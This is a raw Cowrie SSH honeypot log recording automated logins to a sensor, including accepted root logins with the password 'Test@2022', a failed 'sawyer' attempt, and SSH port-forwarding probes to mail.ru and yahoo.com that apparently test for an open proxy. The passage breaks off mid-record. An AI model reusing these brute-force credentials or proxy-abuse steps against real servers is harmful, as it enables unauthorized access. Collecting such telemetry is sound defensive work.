{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.070531Z","src_ip":"77.83.207.83","session":"cef758243919"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9935,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9935","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.212726Z","session":"cef758243919"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.263080Z","src_ip":"77.83.207.83","session":"cef758243919"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":12863,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12863","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.404573Z","session":"cef758243919"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.454903Z","src_ip":"77.83.207.83","session":"cef758243919"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.506837Z","src_ip":"77.83.207.83","session":"cef758243919"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":28096,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf49e005ab7d","protocol":"ssh","message":"New connection: 77.83.207.83:28096 (1.2.3.4:22) [session: bf49e005ab7d]","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.555994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.566267Z","src_ip":"77.83.207.83","session":"bf49e005ab7d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.606835Z","src_ip":"77.83.207.83","session":"bf49e005ab7d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.857864Z","src_ip":"77.83.207.83","session":"bf49e005ab7d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23272,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23272","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.909527Z","session":"bf49e005ab7d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:01.960135Z","src_ip":"77.83.207.83","session":"bf49e005ab7d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13503,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13503","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.104569Z","session":"bf49e005ab7d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.154977Z","src_ip":"77.83.207.83","session":"bf49e005ab7d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":10447,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10447","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.296492Z","session":"bf49e005ab7d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.346779Z","src_ip":"77.83.207.83","session":"bf49e005ab7d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.398205Z","src_ip":"77.83.207.83","session":"bf49e005ab7d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":28195,"dst_ip":"1.2.3.4","dst_port":22,"session":"232600724421","protocol":"ssh","message":"New connection: 77.83.207.83:28195 (1.2.3.4:22) [session: 232600724421]","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.446550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.447520Z","src_ip":"77.83.207.83","session":"232600724421"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.497397Z","src_ip":"77.83.207.83","session":"232600724421"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.745008Z","src_ip":"77.83.207.83","session":"232600724421"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27041,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27041","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.795638Z","session":"232600724421"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.845500Z","src_ip":"77.83.207.83","session":"232600724421"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62963,"dst_ip":"1.2.3.4","dst_port":22,"session":"28d8203542bb","protocol":"ssh","message":"New connection: 212.227.235.229:62963 (1.2.3.4:22) [session: 28d8203542bb]","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.948749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.949394Z","src_ip":"212.227.235.229","session":"28d8203542bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":26537,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:26537","sensor":"my-vps","timestamp":"2025-08-31T03:52:02.987933Z","session":"232600724421"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.037646Z","src_ip":"77.83.207.83","session":"232600724421"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.082152Z","src_ip":"212.227.235.229","session":"28d8203542bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":11861,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11861","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.180348Z","session":"232600724421"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.230109Z","src_ip":"77.83.207.83","session":"232600724421"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.280707Z","src_ip":"77.83.207.83","session":"232600724421"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":28339,"dst_ip":"1.2.3.4","dst_port":22,"session":"85abccc3a818","protocol":"ssh","message":"New connection: 77.83.207.83:28339 (1.2.3.4:22) [session: 85abccc3a818]","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.329319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.339140Z","src_ip":"77.83.207.83","session":"85abccc3a818"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.379400Z","src_ip":"77.83.207.83","session":"85abccc3a818"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.626708Z","src_ip":"77.83.207.83","session":"85abccc3a818"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5754,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:5754","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.677474Z","session":"85abccc3a818"}
{"eventid":"cowrie.login.failed","username":"sawyer","password":"sawyer","message":"login attempt [sawyer/sawyer] failed","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.689404Z","src_ip":"212.227.235.229","session":"28d8203542bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.727083Z","src_ip":"77.83.207.83","session":"85abccc3a818"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24875,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24875","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.867937Z","session":"85abccc3a818"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:03.917667Z","src_ip":"77.83.207.83","session":"85abccc3a818"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":9790,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:9790","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.060101Z","session":"85abccc3a818"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.109808Z","src_ip":"77.83.207.83","session":"85abccc3a818"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55030,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e29ba96116b","protocol":"ssh","message":"New connection: 212.227.125.160:55030 (1.2.3.4:22) [session: 6e29ba96116b]","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.128918Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.160067Z","src_ip":"77.83.207.83","session":"85abccc3a818"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":28464,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f52facca56c","protocol":"ssh","message":"New connection: 77.83.207.83:28464 (1.2.3.4:22) [session: 3f52facca56c]","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.210163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.211111Z","src_ip":"77.83.207.83","session":"3f52facca56c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.261395Z","src_ip":"77.83.207.83","session":"3f52facca56c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.513011Z","src_ip":"77.83.207.83","session":"3f52facca56c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7180,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7180","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.564166Z","session":"3f52facca56c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.614536Z","src_ip":"77.83.207.83","session":"3f52facca56c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:52:04.677270Z","src_ip":"212.227.125.160","session":"6e29ba96116b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh